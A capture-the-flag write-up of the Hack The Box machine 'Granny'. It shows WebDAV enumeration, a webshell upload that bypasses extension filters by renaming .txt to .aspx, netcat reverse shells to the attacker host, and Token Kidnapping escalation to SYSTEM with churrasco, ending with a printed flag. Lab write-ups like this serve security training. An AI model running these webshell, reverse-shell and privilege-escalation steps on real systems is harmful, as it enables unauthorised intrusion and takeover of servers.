Introduction
IP: 10.10.10.15
S.O: Windows
Today we have a windows machine exposing http port wich supports webdav protocol. We will abuse webdab to upload our malicious webshell and get a reverse shell.
From that we will escalate priviledges exploiting MS09-012 or Token Kidnapping
Enumeration
As usual let's start enumerating the open ports running in the victim, initially we will run a TCP SYN scan, just a quick discovery of the open ports
# nmap -sS -p- --open --min-rate 5000 -n -v 10.10.10.15 -oN granny.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2022-02-05 07:13 CET
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
Only http port is open.
Now let's run some enumeration scripts on 80 port:
# nmap -sC -sV -p80 -n -v 10.10.10.15 -oN granny.services
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-ntlm-info:
| Target_Name: GRANNY
| NetBIOS_Domain_Name: GRANNY
| NetBIOS_Computer_Name: GRANNY
| DNS_Domain_Name: granny
| DNS_Computer_Name: granny
|_ Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
| Server Date: Sat, 05 Feb 2022 06:22:24 GMT
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
http enumeration
# whatweb 10.10.10.15
http://10.10.10.15 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/6.0], IP[10.10.10.15], Microsoft-IIS[6.0][Under Construction], MicrosoftOfficeWebServer[5.0_Pub], UncommonHeaders[microsoftofficewebserver], X-Powered-By[ASP.NET]
Webdav enumeration
# davtest -url http://10.10.10.15
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_y_7smiTlFVPsum
********************************************************
Sending test files
PUT asp FAIL
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.pl
PUT shtml FAIL
PUT aspx FAIL
PUT cgi FAIL
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.cfm
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.jsp
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.jhtml
PUT php SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.php
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.txt
PUT html SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.html
********************************************************
Checking for test file execution
EXEC pl FAIL
EXEC cfm FAIL
EXEC jsp FAIL
EXEC jhtml FAIL
EXEC php FAIL
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.txt
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.html
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.pl
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.cfm
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.jsp
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.jhtml
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.php
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.txt
PUT File: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.html
Executes: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.txt
Executes: http://10.10.10.15/DavTestDir_y_7smiTlFVPsum/davtest_y_7smiTlFVPsum.html
Foothold
WebDAV (Web Distributed Authoring and Versioning), is an extension to HTTP that lets clients edit remote content on the web. Basically, WebDAV enables a web server to act as a file server, but our victim does not allow to upload .asp or aspx extensions.
To bypass it what we can do is upload a .txt file and then once it is on the server, we can move the .txt file to .asp file
There is a command called cadaver which allows to upload the file and them move it:
cadaver http://10.10.10.15
dav:/> help
Available commands:
ls cd pwd put get mget mput
edit less mkcol cat delete rmcol copy
move lock unlock discover steal showlocks version
checkin checkout uncheckout history label propnames chexec
propget propdel propset search set open close
echo quit unset lcd lls lpwd logout
help describe about
Alias: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/>
Let's upload a webshell:
cp /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx
#mv cmd.aspx cmd.txt
# cadaver http://10.10.10.15
dav:/> put cmd.txt
Transferiendo cmd.txt a '/cmd.txt':
Progreso: [ ] 0,0% of 1400 bytes Progreso: [=============================>] 100,0% of 1400 bytes exitoso.
dav:/> ls
Listando colección `/': exitoso.
Col: DavTestDir_y_7smiTlFVPsum 0 feb 5 07:27
Col: _private 0 abr 12 2017
Col: _vti_bin 0 abr 12 2017
Col: _vti_cnf 0 abr 12 2017
Col: _vti_log 0 abr 12 2017
Col: _vti_pvt 0 abr 12 2017
Col: _vti_script 0 abr 12 2017
Col: _vti_txt 0 abr 12 2017
Col: aspnet_client 0 abr 12 2017
Col: images 0 abr 12 2017
_vti_inf.html 1754 abr 12 2017
cmd.txt 1400 feb 5 07:42
iisstart.htm 1433 feb 21 2003
pagerror.gif 2806 feb 21 2003
postinfo.html 2440 abr 12 2017
dav:/>
dav:/> move cmd.txt cmd.aspx
Moviendo '/cmd.txt' a '/cmd.aspx': exitoso.
dav:/> ls
Listando colección `/': exitoso.
Col: DavTestDir_y_7smiTlFVPsum 0 feb 5 07:27
Col: _private 0 abr 12 2017
Col: _vti_bin 0 abr 12 2017
Col: _vti_cnf 0 abr 12 2017
Col: _vti_log 0 abr 12 2017
Col: _vti_pvt 0 abr 12 2017
Col: _vti_script 0 abr 12 2017
Col: _vti_txt 0 abr 12 2017
Col: aspnet_client 0 abr 12 2017
Col: images 0 abr 12 2017
_vti_inf.html 1754 abr 12 2017
cmd.aspx 1400 feb 5 07:42
iisstart.htm 1433 feb 21 2003
pagerror.gif 2806 feb 21 2003
postinfo.html 2440 abr 12 2017
dav:/>
If we access http://10.10.10.15/cmd.aspx, we can access our webshell and execure commands in the victim
Now let's get a reverse shell:
We will use a samba connection from the victim to access netcat on my attacker machine and run the netcat from the victim:
//10.10.14.12/a/nc.exe 10.10.14.12 444 -e cmd.exe
attacker# smbserver.py a .
AUTHENTICATE_MESSAGE (\,GRANNY)
[*] User GRANNY\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] AUTHENTICATE_MESSAGE (HTB\GRANNY$,GRANNY)
[*] User GRANNY\GRANNY$ authenticated successfully
[*] GRANNY$::HTB:c86
root@kali:/home/alter/htb-vip/prep_oscp/granny# nc -nlvp 444
listening on [any] 444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.15] 1036
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
c:\windows\system32\inetsrv>
Priviledge Escalation
We run some basic enumeration commands, whoami, whoami /all and systeminfo
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================ ================ ============================================== ==================================================
NT AUTHORITY\NETWORK SERVICE User S-1-5-20 Mandatory group, Enabled by default, Enabled group
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
GRANNY\IIS_WPG Alias S-1-5-21-1709780765-3897210020-3926566182-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
C:\WINDOWS\system32>systeminfo
systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 0 Hours, 45 Minutes, 57 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 740 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,286 MB
Page File: In Use: 184 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
C:\WINDOWS\system32>
We see SeImpersonatePrivilege is enabled and the victim is a 32 bits windows 2003 standard edition, so we have all the info we need to escalate priviledges:
We will abuse of a vulnerability called Token Kidnapping, basically if you can run code under any service in W2k3, then you can own Windows, this is becasue Windows services accounts can impersonate.
And this is our case.
In order to exploit this vuln we will use a tool called churrasco that you can download from this repository:
We upload to the victim the binary, churrasco.exe and the netcat for windows:
C:\WINDOWS\Temp\granny>copy \\10.10.14.12\a\churrasco.exe ch.exe
copy \\10.10.14.12\a\churrasco.exe ch.exe
1 file(s) copied.
C:\WINDOWS\Temp\granny>copy \\10.10.14.12\a\nc.exe nc.exe
copy \\10.10.14.12\a\nc.exe nc.exe
1 file(s) copied.
Just we have to run churrasco providing as argument the netcat command to get our reverse shell:
C:\WINDOWS\Temp\granny>ch.exe -d "C:\WINDOWS\Temp\granny\nc.exe -e cmd.exe 10.10.14.12 443"
ch.exe -d "C:\WINDOWS\Temp\granny\nc.exe -e cmd.exe 10.10.14.12 443"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x718
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x710
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
C:\WINDOWS\Temp\granny>
root@kali:/home/alter/htb-vip/prep_oscp/granny# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.15] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>whoami
whoami
nt authority\system
C:\WINDOWS\TEMP>
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
aa4beed1c0584445ab463a6747bd06e9
No hay comentarios:
Publicar un comentario